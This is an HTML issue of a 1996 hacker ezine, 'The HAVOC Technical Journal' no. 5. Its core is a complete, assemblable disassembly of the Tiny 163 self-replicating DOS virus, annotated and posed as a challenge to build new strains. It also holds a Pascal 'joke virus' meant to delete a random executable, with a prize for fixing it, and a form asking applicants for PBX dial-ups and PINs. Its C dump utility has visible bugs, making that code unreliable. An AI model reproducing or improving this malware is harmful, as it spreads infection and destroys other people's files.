<title>The HAVOC Technical Journal Issue 5</title>
<body background="http://kr5hou2zh4qtebqk.onion/ezines/thtj/gray_roc.gif" text="#ffffff"
link="#0000ff" vlink="#ff0000" alink="#00ccff">
<h1>The HAVOC Technicl Journal</h1>
<h3>Vol. 1 | No.5 | October 31st, 1996 | A HAVOC Bell Systems Publication</h3>
      <h3> "Pleading the Fifth"</h3>
<h4>Happy Halloween!</h4>
<hr>
<a name="index">
Inside this issue:<br>

        <a href="thtj5.html#new">Whats new this issue</a>..............................<br>
        <a href="thtj5.html#ed">Editorial</a>.........................................Scud-O <br>
        <a href="thtj5.html#dump">The Dumper</a>........................................Scud-O <br> 
        <a href="thtj5.html#virus">Virus Challenge</a>...................................Scud-O / 40HEX <br>
        <a href="thtj5.html#burrito">The Burrito Virus</a>.................................Scud-O <br>
        <a href="thtj5.html#bot">BOT.C</a>.............................................|\|\cFill<br>
        <a href="thtj5.html#ani">ANI Spoofing</a>......................................Keystroke<br>
        <a href="thtj5.html#signup">Sign Up Sheet for HAVOC Bell Systems</a>..............<br>
        <a href="thtj5.html#x11">X11 services</a>......................................Scud-O<br>
        <a href="thtj5.html#rtfm">RTFM: The lamer Journal</a>...........................<br>
        <a href="thtj5.html#roll">ROLL CALL & more!</a>.................................<br>    
        <A href="thtj5.html#next">Next Month</a>........................................<br>      
<br>
       (I need more writers!!! e-mail me if ya want to write an article!
        my e-mail is: FoxMulder@worldnet.att.net 
        the mags e-mail is: thtj@juno.com (wheee.. we get to read ads as
        we get your e-mail!) )

        This months music supplied by: Geggy Tah, TOOL, Korn
        Sublime, Violent Femmes, Fun Loving Criminals and WHFS 99.1 !
<a name="new">
<h3>What's new in this issue:</h3>
<a href="thtj5.html#index"> Back to the top</a><br>
        Well not much is new.. Yea Right! Both |\|\cFill and Keystroke<br>
        have joined HBS and they have both have articles in this issue.<br>
        Enjoy for they are great people!<br>

<hr>
       <h3>How to contact us:</h3>
        Check Out Our Web Site:
         <a href="http://www.geocities.com/SiliconValley/8805/"> www.geocities.com/siliconvalley/8805/</a><br>
         my (Scud-O)  e-mail is : <a href="mailto:FoxMulder@worldnet.att.net"> FoxMulder@worldnet.att.net</a><br>
         Psycho's lame email: CLASSIFIED<br>
         |\|\cFill's email : CLASSIFIED<br>
         Keystroke's email : CLASSIFIED<br>
         (If you guys want your email unclassified tell me so! )<br>
         our Mag e-mail is : <a href="mailto:thtj@juno.com"> thtj@juno.com</a><br>
         HELLCORE's e-mail is : <a href="mailto:hellcore@juno.com"> hellcore@juno.com</a><br>
<hr>
<a name="ed">
<h3>Editorial:</h3>
        by Scud-O<br>
<a href="thtj5.html#index"> Back to the top</a><br>
Well HBS is really taking off again. After not seeing Pinky for a while and
Rotten & Sid's move I was worried that HBS would die. But |\|\cFill and
Keystroke (who are VERY cool people) have joined up! They each did an article
for this issue and next month we will have info sheets on them.<br><br>
        Also coming soon is a redesigned HBS web site! The graphics are
 almost done, the 403 Forbideen club is being worked on,  the members pages
 will be created, and the links page will be up! Look for both Frames and non
 frames pages and maybe some Java & JavaScript! I may be moving to L0pht soon
 so then we will have CGI too!<br><br>
        In other news HBS is now into commercial & private Web Development!
So if you need any web stuff done cheaply we will do it! (we have super low
rates!) Check out our web page for more info up soon including the rates!
<br><br>
 <b>Now on to the bickering:</b><br>
This has been a CRAZY month! new HBS memebers, me running my schools network,
coming in on weekends to work on it more! it TOO much! so that is why this
issue has been cut down in size and why next issue isn't coming out until the
15th of December! If you want to complain.. #$^%$@# you! It takes a HELL of a
LOT of work to run a web site, run a network, connect that network to inet,
and edit this magizine as well as write it up! so help by writting articles
for me!!!<br><br>
<pre>
    ----------------------------------------------
  /       ---/   --/  /   /  |  /------/   /    /
 /---       /-----/------/-----/      /   /    /
/----------/                         /--------/
              -of HAVOC Bell Systems-
FoxMulder@worldnet.att.net

the National Get A Gat! [tm] Program - Join it today!

"Beliefs are dangerous. Beliefs allow the mind to stop functioning.
A non-functioning mind is clinically dead. Believe in nothing"
                                        -Tool "AEnima"
</pre>                


<a name="dump">
<h3>The Dumper:</h3>
        by Scud-O<br>
<a href="thtj5.html#index"> Back to the top</a><br>
This is a HEX Dump utility I wrote which can really help you in virus writing<br>
It is VERY simple but it works.. if you want more of a Dumper go find one..<br>
they are out there.. ALSO: if you fix this Dumper send me a copy of the fix<br>
and the source, I'll put it in a future issue! Below is the C source... its<br>
about 8563 bytes the assembly version was only 1294 bytes but it was too much<br>
typing to finish for this issue (ASM: 436 C:77 Winner:C!)<br>
<pre>
/*  DUMP.C    Display the binary contents of a file in
              hex and ASCII on the standard output device.

    Compile: C> CL DUMP.C or whatever your compiler is..

    Usage:   C>DUMP unit:path\filename.ext

    Copyright (C) 1996 HAVOC Bell Systems ALL Rights F**ked!
    Written by Scud-O of HBS
*/

#include <stdio.h>
#include <io.h>
#include <fcntl.h>

#define REC_SIZE 16   /* input file record size  */

main (int argc, char *argv[])
{
        int fd;                 /* input file handle */
        int status = 0;         /* status from file read */
        long fileptr = OL;      /* current file byte offset */
        char filebuf[REC_SIZE]; /* data from file */

        /* abort if missing filename */
        if argc != 2)
        {
                fprintf(stderr, "\nDumper: wrong number of parameters\n");
                exit(1);
        }

        /* open file in binary mode, abort if fails */
        if((fd = open(argv[1],O_RDONLY | O_BINARY) ) == -1)
        {
          fprintf(stderr, "\nDumper: can't find file %s \n", argv[1]);
        /*  read and dump records until EOF */
        while((status = read(rd,filebuf,REC_SIZE) ) != 0)
        {
                dump_rec(filebuf, fileptr, status);
                fileptr += REC_SIZE;
        }

        close(fd);      /* close the input file */
        exit(0);        /* return the success code */
}
/* Display record (16 bytes) in hex and ASCII on standard output */
dump_rec(char *filebuf, long fileptr, int length)
{
        int i; /* index to current record */

        if(fileptr % 128 == 0) /* display heading if needed */
                printf("\n\n    0 1 2 3 4 5 6 7 8 9 A B C D E F");

        printf("\n%041X ", fileptr); /* display file offset */

        /* display hex equivalent of each byte from file */
        for(i=0; i < length ; i++)
                printf(" %02X", (unsigned char)filebuf[i]);

        if(length != 16)        /* spaces if partial record */
                for(i=0; i<(16-length); i++)
                        printf("   ");

        /* display ASCII equivalent of each byte from file */
        printf("   ");
        for(i=0;i<lenght;i++)
        {
                if(filebuf[i] < 32 || filebuf[i] > 126)
                        putchar('.');
                else putchar(filebuf[i]);
        }
}
</pre>
<a name="virus">
<h3>Virus Challenge:</h3>
        by Scud-O / 40Hex<br>
<a href="thtj5.html#index"> Back to the top</a><br>
        Okay people this article was originally in 40Hex Issue 1. This<br>
        is reprinted because It gives you a challenge to inprove this virus<br>
        so go a head and work on it! It will greatly help your virus writing<br>
        skills. <br>
                          <h4>- VIRUS SPOTLIGHT -</h4>


     The first virus I would like to spotlight is the Tiny virus, lets see<br>
what our good friend Patti Hoffman (bitch) has written about it.<br>

 Name:        Tiny<br>
 Aliases:     163 COM Virus, Tiny 163 Virus, Kennedy-163<br>
 V Status:    Rare<br>
 Discovery:   June, 1990<br>
 Symptoms:    COMMAND.COM & .COM file growth<br>
 Origin:      Denmark<br>
 Eff Length:  163 Bytes<br>
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector<br>
 Detection Method:  ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+<br>
 Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infectedfiles<br>
 General Comments:<br>
       The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason<br>
       of Iceland in June 1990.  This virus is a non-resident generic<br>
       .COM file infector, and it will infect COMMAND.COM.<br>
<br>
       The first time a file infected with the 163 COM Virus is executed,<br>
       the virus will attempt to infect the first .COM file in the<br>
       current directory.  On bootable diskettes, this file will normally<br>
       be COMMAND.COM.  After the first .COM file is infected,each time<br>
       an infected program is executed another .COM file will attempt to<br>
       be infected.  Files are infected only if their original length is<br>
       greater than approximately 1K bytes.<br>
<br>
       Infected .COM files will increase in length by 163 bytes, and have<br>
       date/time stamps in the directory changed to the date/time the<br>
       infection occurred.  Infected files will also always end with this<br>
       hex string: '2A2E434F4D00'.<br>
<br>
       This virus currently does nothing but replicate, and is the<br>
       smallest MS-DOS virus known as of its isolation date.<br>
<br>
       The Tiny Virus may or may not be related to the Tiny Family.<br>
       ^like she'd know the difference!<br>
<br>
OK, Theres the run down on the smallest MS-DOS virus known to man.  As for<br>
it being detected by SCAN we'll see about that.<br>
<br>
Here is a dissasembly of the virus, It can be assembled under Turbo Assembler<br>
or MASM.<br>

<hr>
<pre>
PAGE  59,132


data_2e         equ     1ABh                    ;start of virus

seg_a           segment byte public             ;
                assume  cs:seg_a, ds:seg_a      ;assume cs, ds - code


                org     100h                    ;orgin of all COM files
s               proc    far

start:
                jmp     loc_1                   ;jump to virus


;this is a replacement for an infected file

                db      0CDh, 20h, 7, 8, 9      ;int 20h
                                                ;pop es

loc_1:
                call    sub_1                   ;



s               endp


sub_1           proc    near                    ;
                pop     si                      ;locate all virus code via
                sub     si,10Bh                 ;si, cause all offsets will
                mov     bp,data_1[si]           ;change when virus infects
                add     bp,103h                 ;a COM file
                lea     dx,[si+1A2h]            ;offset of '*.COM',0 - via SI
                xor     cx,cx                   ;clear cx - find only normal
                                                ;attributes
                mov     ah,4Eh                  ;find first file
loc_2:
                int     21h                     ;

                jc      loc_6                   ;no files found? then quit
                mov     dx,9Eh                  ;offset of filename found
                mov     ax,3D02h                ;open file for read/write access
                int     21h                     ;

                mov     bx,ax                   ;save handle into bx
                mov     ah,3Fh                  ;read from file
                lea     dx,[si+1A8h]            ;offset of save buffer
                mov     di,dx                   ;
                mov     cx,3                    ;read three bytes
                int     21h                     ;
                
                cmp     byte ptr [di],0E9h      ;compare buffer to virus id
                                                ;string
                je      loc_4                   ;
loc_3:
                mov     ah,4Fh                  ;find the next file
                jmp     short loc_2             ;and test it
loc_4:
                mov     dx,[di+1]               ;lsh of offset
                mov     data_1[si],dx           ;
                xor     cx,cx                   ;msh of offset
                mov     ax,4200h                ;set the file pointer
                int     21h                     ;

                mov     dx,di                   ;buffer to save read
                mov     cx,2                    ;read two bytes
                mov     ah,3Fh                  ;read from file
                int     21h                     ;

                cmp     word ptr [di],807h      ;compare buffer to virus id
                je      loc_3                   ;same? then find another file

;heres where we infect a file

                xor     dx,dx                   ;set file pointer
                xor     cx,cx                   ;ditto
                mov     ax,4202h                ;set file pointer
                int     21h                     ;

                cmp     dx,0                    ;returns msh
                jne     loc_3                   ;not the same? find another file
                cmp     ah,0FEh                 ;lsh = 254???
                jae     loc_3                   ;if more or equal find another file

                mov     ds:data_2e[si],ax       ;point to data
                mov     ah,40h                  ;write to file
                lea     dx,[si+105h]            ;segment:offset of write buffer
                mov     cx,0A3h                 ;write 163 bytes
                int     21h                     ;

                jc      loc_5                   ;error? then quit
                mov     ax,4200h                ;set file pointer
                xor     cx,cx                   ;to the top of the file
                mov     dx,1                    ;
                int     21h                     ;

                mov     ah,40h                  ;write to file
                lea     dx,[si+1ABh]            ;offset of jump to virus code
                mov     cx,2                    ;two bytes
                int     21h                     ;

;now close the file

loc_5:
                mov     ah,3Eh                  ;close file
                int     21h                     ;

loc_6:
                jmp     bp                      ;jump to original file

data_1          dw      0                       ;
                db      '*.COM',0               ;wild card search string


sub_1           endp
seg_a           ends
                end     start

</pre>
<hr>

Its good to start off with a simple example like this.  As you can see
what the virus does is use the DOS 4Eh function to find the firsy COM file
in the directory.  If no files are found the program exits.  If a file is
found it compares the virus id string (the virus jump instruction) to the
first two bytes of the COM file.  If they match the program terminates.
If they don't match the virus will infect the file.  Using two key MS-DOS
functions to infect.
<br>
The first -<br>

INT 21h Function 42h<br>
SET FILE POINTER<br>
<br>
AH   =   42h<br>
AL   =   method code<br>
BX   =   file handle<br>
CX   =   most significant half to offset<br>
DX   =   least "                       "<br>
<br>
If there is an error in executing this function the carry flag will be set,
and AX will contian the error code.  If no error is encountered
<br>
DX   =   most significant half of file pointer<br>
AX   =   least "                             "<br>

<br>
The second (and most) important function used by any virus is<br>
<br>

INT 21h Function 40h<br>
WRITE TO FILE OR DEVICE<br>
<br>
AH    =   40h<br>
BX    =   handle<br>
CX    =   number of bytes to write<br>
DS:DX =   segment of buffer<br>
<br>
Returns<br>
<br>
AX    =   bytes transferred<br>
<br>
on error<br>

AX    =  Error Code and flag is set.<br>


An example of Function 40h is ----<br>
<pre>

     mov     ah,40h                   ;set function
     mov     bx,handle                ;load bx with handle from prev open
     mov     cx,virus_size            ;load cx with # of bytes to write
     mov     dx,offset write_buffer   ;load dx with the offset of what to
                                      ;write to file
     int     21h                      ;

</pre>
This function is used by 98% of all MS-DOS viruses to copy itself to a
victim file.

<br>
Now heres a sample project -  create a new strain of Tiny, have it restore
the original date and time etc...
<br>

                                                                          HR
<hr>
<a name="burrito">
<h3>The Burrito Virus:</h3>
  by Scud-O<br>
<a href="thtj5.html#index"> Back to the top</a><br>
        This is a joke virus just like the Cookie virus. It says that it
wants a burrito, if you type 'burrito' it exits. Type 'breakfast burrito'
and the virus deletes itself. type 'taco bell burrito' and the virus kills
a random file (EXE). Actually this virus isn't really a true virus, as it
doesnt spread (hmm.. maybe for version 2... ) anyway I wrote this is PASCAL
basically because I was bored in PASCAL class. I'm going to port this to ASM
as soon as i find the time... (hey im a busy guy alright?!?!) currently this
file is like 4000 or so bytes (give or take..)
PLEASE NOTE: This is a VERY early version of the virus! The final is lost
somewhere on my network at school... I will hopefully find it for next issue!
Challenge: get this porgram to work fully! I will give a prize to whoever
fixes it first!<br><br><br>
<pre>
PROGRAM burrito (Input,Output,InfectedFile);
USES dos;

(*CONST
     ThisFile = 'win.com';*)

VAR
   regs: Registers;
   DirInfo: SearchRec;
   InfectedFile : Text;
   KillFile,
   ThisFile,
   UsrInput : String;

BEGIN
     ThisFile := 'win.com' ;
     Write('I want a burrito! ');
     ReadLn(UsrInput);
     If UsrInput = 'burrito'
     Then
         Begin
         End ;
     If UsrInput = 'breakfast burrito'
     Then
         Begin
              WriteLn('Yuck');
                 regs.ah := $41;
                     with regs do
                     msdos(regs);
                     with regs do
                          begin
                               str(dx, ThisFile);
                          end;
         End;
     If UsrInput = 'taco bell burrito'
     Then
         Begin
               KillFile := FindFirst('*.EXE', Archive, DirInfo);
               begin
                     regs.ah := $41;
                     with regs do
                     msdos(regs);
                     with regs do
                          begin
                               str(dx , KillFile);

                          end;
               end;
         End;

end.
</pre>
<hr>


<a name="bot">
<h3>A simple C bot by |\|\cFill:</h3>
<a href="thtj5.html#index"> Back to the top</a><br>
<pre>
/*
 * bot.c - example of IRC automaton
 *
 * invoke with "irc -e bot"
 *
 * TnG - //\/\cFiLL
 * repo
 */
 
#include <stdio.h>
#include <string.h>    
#include "varargs.h"
 
#define LOGFILE "bot.log"
#define MAXLEN 270
#define MAXARGS 135
#define PUBLIC  0x01
#define PRIVATE 0x02
#define NOTICE  0x04
#define DCCCHAT 0x08
 
char *strchr(char *str, int ch);
 
void init(void);
void strip(char *str);
int makeargs(char *str, char **av);
void parse(int ac, char **av);
void say();
 
int
main()
{
	FILE *log;
	char *buf, **av;
	int ac;
 
	buf = (char *) malloc(sizeof(char) * MAXLEN);
	av = (char **) malloc(sizeof(char **) * MAXARGS);
	if(!(log = fopen(LOGFILE, "a"))) {
		perror(LOGFILE);
		exit(1);
	}
	while(fgets(buf, MAXLEN, stdin)) {
		strip(buf);
		fprintf(log, "%s\n", buf);
		fflush(log);
		ac = makeargs(buf, av);
		parse(ac, av);
		fflush(stdout);
	}
	fclose(log);
	free(av);
	free(buf);
	exit(0);
}
 
void init(void)
{
	puts("/join #home");
	puts("/notify SigInt");
}
 
void
strip(char *str)
{
	char *t;
 
	if(t = strchr(str, '\n'))       *t = 0;
	if(t = strchr(str, '\r'))       *t = 0;
	if(t = strchr(str, '\\'))       *t = 0;
	if(t = strchr(str, ';'))        *t = 0;
}
 
int
makeargs(char *str, char **av)
{
	char *t = str;
	int ac = 0;
 
	while(*t) {
		if(ac < MAXARGS) av[ac++] = t;
		while(*t && *t != ' ') t++;
		if(*t) *t++ = 0;
		while(*t && *t == ' ') t++;
	}
	return(ac);
}
 
void pargs(int ac, char **av)
{
	int i;
 
	for(i = 0; i < ac; i++)
		printf("%s ", av[i]);
	printf("\n");
}
 
void say(va_alist) va_dcl
{
	va_list args;
	char *from, *fmt;
	int flags;
 
	va_start(args);
	flags = va_arg(args, int);
	from = va_arg(args, char *);
	fmt = va_arg(args, char *);
 
	/* parse flags */
 
	if(flags & PUBLIC)
		vprintf(fmt, args);
	if(flags & PRIVATE) {
		printf("/msg %s ", from);
		vprintf(fmt, args);
	}
	if(flags & NOTICE) {
		printf("/notice %s ", from);
		vprintf(fmt, args);
	}
	if(flags & DCCCHAT) {
		printf("/msg =%s ", from);
		vprintf(fmt, args);
	}
	va_end(args);
}
 
void parse(int ac, char **av)
{
#define public() flags = PUBLIC
#define private() flags = PRIVATE
#define notice() flags = NOTICE
#define dccchat() flags = DCCCHAT
#define match(x,y) (!strcmp((x),(y)))
 
	static char nick[9], from[9], master[9], chnl[11];
	char *first, *last, *cmd, *second;
	int client = 0, trusted = 0, flags = PUBLIC;
 
	strcpy(nick, "SigBot");
 
	/* determine type of input */
 
	first = av[0];
   second = av[2];
   last = first + strlen(first) - 1;
	cmd = av[1];
 
	/* set flags based on input */
 
	if(*first == '<' && *last == '>') public();
	else if(*first == '*' && av[0][1] != '*' && *last == '*') private();
	else if(*first == '-' && *last == '-') notice();
	else if(*first == '=' && *last == '=') dccchat();
	else client++;
 
	*last = 0;
	strncpy(from, first + 1, 8);
   if(match(from, "SigInt")) trusted++;
 
	/* begin parsing bot's input */
 
	if(client) {
		if(match(av[4], "channels.")) {
			strcpy(chnl, "#home");
			init();
		}
		else if(match(av[1], "You") && match(av[4], "kicked")) {
			printf("/join %s\n", chnl);
			sleep(1);
			printf("%s, you bastard!!!\n", av[9]);
		}
		else if(match(cmd, "DCC") && match(av[2], "CHAT"))
			printf("/dcc chat %s\n", av[7]);
		else if(match(cmd, "DCC") && match(av[2], "SEND")) {
			private();
			say(flags, av[7], "Sorry, %s, I don't do DCC :(\n", av[7]);
		}
		else if(match(av[2], "invites")) {
			strcpy(chnl, av[6]);
			printf("/join %s\n", chnl);
			printf("/msg %s thanks!\n", av[1]);
		}
		else if(match(av[3], "joined") && strcmp(av[1], nick)) {
			if(match(av[1], "SigInt"))
				printf("/mode %s +o SigInt\n", chnl);
		}
		else if(match(av[1], "Signon")) {
			strcpy(from, av[3]);
			private();
			say(flags, from, "hi %s!\n", av[3]);
			printf("/msg SigInt %s is here!\n", av[3]);
		}
		else if(match(cmd, "Signoff")) 
			printf("/msg SigInt %s has left!\n", av[3]);
		return;
	}
 
	/* parse public, private, notice, and dccchat messages */
 
	if(match(cmd, "die") && trusted) puts("/sign Bad breath?");
	else if(match(cmd, "do") && trusted) pargs(ac - 2, av + 2);
	else if(match(cmd, "finger")) printf("/exec -out finger %s\n", av[2]);
	else if(match(cmd, "go") && trusted) {
		strcpy(chnl, av[2]);
		printf("/join %s\n", chnl);
	}
	else if(match(cmd, "nick") && trusted) printf("/nick %s\n", av[2]);
	else if(match(cmd, "op") && trusted) printf("/mode %s +o %s\n", chnl, av[2]);
	else if(match(cmd, "ping")) say(flags, from, "pong.\n");
	else if(match(cmd, "sextalk")) printf("/exec -out SexTalk\n");
   else if(!strcasecmp(cmd, "What"))  
      printf("I don't know, that's a good question %s\n", from);
   else if(!strcasecmp(cmd, "Why"))
      printf("yeah, why?\n");
   else if(!strcasecmp(cmd, "How"))
      printf("%s, doing so is pretty impossible, unless you're a bot!\n", from);
   else if(!strcasecmp(cmd, "elite"))
      printf("very elite\n"); 
   else if(!strcasecmp(cmd, "re"))
      printf("re %s\n", second);
	     
      
      
}
</pre>
<hr>
<a name="ani">
<h3>ANI Spoofing by Keystroke</h3>
<a href="thtj5.html#index"> Back to the top</a><br>
(this was first published in PLA issue 41. (thats why he's the mad little
PLA (Phone Losers of America) Insider!!))
<br>
Dear PLA:<br>
I've found a new way to block 800 ANI. It is called Net2Phone and allows<br> 
people to place calls using a piece software which connects to IDT's (the<br>
company offering Net2Phone) servers and routes the call from their fones in <br>
New Jersey to wherever you want to call.<br>
<br>
Here is how they describe it, "Net2Phone enables Internet users with sound<br>
equipped PCs to initiate calls from their computers and transmit them over the<br> 
Internet to IDT's phone switches. The switches then convert the signal from <br>
the 'packet switch network' Internet environment to the 'circuit switch <br>
network' telephone environment. And then  to its' final destination - any <br>
ordinary telephone. The result is real-time uninterrupted voice communication<br>
between the two calling parties."<br>
<br>
This service is offered for free on 800 and 888 numbers. If you want to call <br>
regular numbers it cost's extra. Unfortunately, after you call the number, you <br>
cannot send tones and it is too staticky to use a tone dialer. Grab a copy at<br>
http://www.net2phone.com.<br>
<br>
Keystroke - prenzo@soho.ios.com<br>
<br>

<a name="signup">
<h3>The HAVOC Bell Systems Sign Up sheet:</h3>
<a href="thtj5.html#index"> Back to the top</a><br>
        (NOTE: im not real sure why im doing this, Its usually
        invite only , but i dunno, sign this and
        maybe you can get in... )
 <HR>
<pre>
           Application For Membership To HAVOC Bell Systems

    HAVOC Bell Systems is quickly coming on to the net and irc.
    (we'd be on HellNet[tm] if Scud-O EVER gets his own line!!)
    We are a serious group of Phreakers/Hackers/ and Virus Writers.
    We are all over the globe so.. a group meeting is pretty unlikely.

    If you wish to apply for membership to HBS or if you want
    your board to become to become a HBS distribution site
    fill out the application below and upload to Scud-O at:
    FoxMulder@worldnet.att.net
    for the Subject put: HAVOC Bell Systems Sign Up Sheet
    (anything else will not be reviewed!)
   
    Keep in mind, from the start of HAVOC Bell Systems we have been
    mainly Phreakers, but we are now into hacking and viruses.
    We do this to fight for phreaker's rights and to fight the
    Ma Bell beast.

------------------------------------------------------------------------------

                       Application For Membership


  I am interested in becoming

  ___ A HAVOC Bell Systems (HBS) Member
  ___ An HBS  Distribution Site Sysop


  Handle:      ________________
  Aliases:     ________________
  Email :      ________________

  Are you in any other groups? List them
  _____________________________________
  _____________________________________
  _____________________________________

  What are you into? (Hacking/Phreaking/Virus/Etc.. )
  ________________________________________________________________
  What do you know?
  ________________________________________________________________
  ________________________________________________________________
  ________________________________________________________________
  ________________________________________________________________

  Do you know any programming languages? (C/PASCAL/ASM)
  ____________________________ (Know well)
  ____________________________  ...
  ____________________________ (Just messed with)


  Are you a sysop of a BBS?  ___
  If yes leave the vitals:
                           BBS Name: _________________________
                           Dialup:   _________________________
                           State/Country: ____________________
                           Running: example: PCBoard _________

  Do you have a web site? ___
  vitals:
     Address: _________________________________________________
     CGI access : ______ (Y or N)
     Storage space: __________MB

  List three people you know (handles) : _________________
                                         _________________
                                         _________________

  List what IRC channels you are on:
  Channel: ____________________
  Server:______________________ (ex. Undernet, Dalnet, etc)
  Do you have ops on this channel? ___ (Y/N)

  List a BBS that you have 'elite' access to:

  Name: _____________________   Dialup: _______________________
  Sysop: ____________________   NUP: __________________________

  Do you have a VMB:
  Dialup: _________________ Box#: _________

  Quiz:
  1. What is a PBX? __________________________________________
  2. What is a PBX dial up # :________________________________
                        PIN  :________________________________
  3. What is a Bot? __________________________________________
  Are you in any way connected to and law enforcment agency? ___
  (NOTE: by law you MUST answer this truthfully! )
  Do you realize that being untruthfull to the above question
  waviers all legal matters: ____
  Are you in anyway connected to any software company? ___


  Thank for filling this out. -The HAVOC Bell Systems gang-

     Please email this application to Scud-O at: FoxMulder@worldnet.att.net
     for the Subject put: HAVOC Bell Systems Sign Up Sheet
     (anything else will not be reviewed!)
</pre>
<hr>
<a name="x11">
<h3>X11 Services: by Scud-O</h3>
<a href="thtj5.html#index"> Back to the top</a><br>
        011  : Used for international dialing<br>
        111  : No use<br>
        211  : No Use<br>
        311  : Disconnect phone temporally ( In Baltimore it is for non
                                             emergency Five-O service  )<br>
        411  : Information ( So whats the 411? )<br>
        511  : No Use<br>
        611  : Repairs<br>
        711  : No Use<br>
        811  : No Use<br>
        911  : Emergency ( Rescue911 )<br>
NOTE: This was tested in the Baltimore Metro area, so other places this may be different!
<hr>
<a name="rtfm">
<h3>RTFM: The Lamer Journal</h3>
<a href="thtj5.html#index"> Back to the top</a><br>
<br>

<h4>What is RTFM : The Lamer Journal?</h4>
        basically it is a monthly article teaching basics of stuff, which
        will continue until we feel we have covered what you need to know.<br>
<br>
        Next month will have a basics on the smarts you need to stay out
        in the world long enough to practice your hobby.<br>
<br>
        Each monthly installment has info and a quiz on the material, and
        info on where to get more info, practice sites, tools, etc.<br>
<br>
        Look for it starting with issue 6!

<hr>
<a name="roll">
<h3>ROLL CALL & More!</h3>
<a href="thtj5.html#index"> Back to the top</a><br>
<br>
<h4>Who is HAVOC Bell Systems?</h4>
        Scud-O      : Bunghole<br>
        Psycho      : Burrito<br>
        |\|\cFill   : Bot boy<br>
        Keystroke   : PLA Insider<br>
        Pinky       : In hidding<br>
        Rotten      : Moving fool<br>
        Sid         : Other Moving Fool  (and the're twins as well! )<br>

       Want to join? check out the sign up sheet!<br>
<br>
<h4>Cool People:</h4>
        phire<br>
        UnaBomber<br>
        theLURK7R (sometimes theLURK3R  ) or 4, 2 , etc...<br>
        LogicBox<br>
        Dem0nWeed<br>
	darkcyde<br>
	Rap3d_C0w<br>
                      all on IRC!<br>
<br>

<h4>This Month Question: Who is Scud-O?</h4>
        Scud-O is from the cool as shit comic book Scud: The Dispossible
        Assassin by Rab Schrab and Fireman Press. In issue 2 there is a
        TV ad for the Scud line and there is a little gun that talks and
        his name is Scud-O. There was a cool theme song it was:<br>
                "Get your spite in a bag,<br>
                get your bile piled up,<br>
                its the best damn vengance you've ever had!"<br>

    <br><br>    
<h4>  Next Month's Question: Who are |\|\cFill and Keystroke?</h4>

<hr>
<a name="next">
<h3>Next Month:</h3>
<a href="thtj5.html#index"> Back to the top</a><br>
        This MAY be what we will have in issue 6<br>
          - The HellNet[tm] script / C code!<br>
          - Voice Mail Boxes<br>
          - PBX's<br>
          - Pager Talk (Delayed from this issue)<br>
          - NIDs pt.2  (Delayed from this issue)<br>
          - Whats up in the HELLCORE labs? (Delayed from this issue)<br>
          - Undernet Crash (Delayed from this issue)<br>
          - More from the RTFM: The Lamer Journal<br>
          - Much, Much more TBA!<br>
                Issue 6 is out Dec. 15th!<br>
<br>
 cya ya next issue! - The HAVOC Technical Journal Crew<br><br>


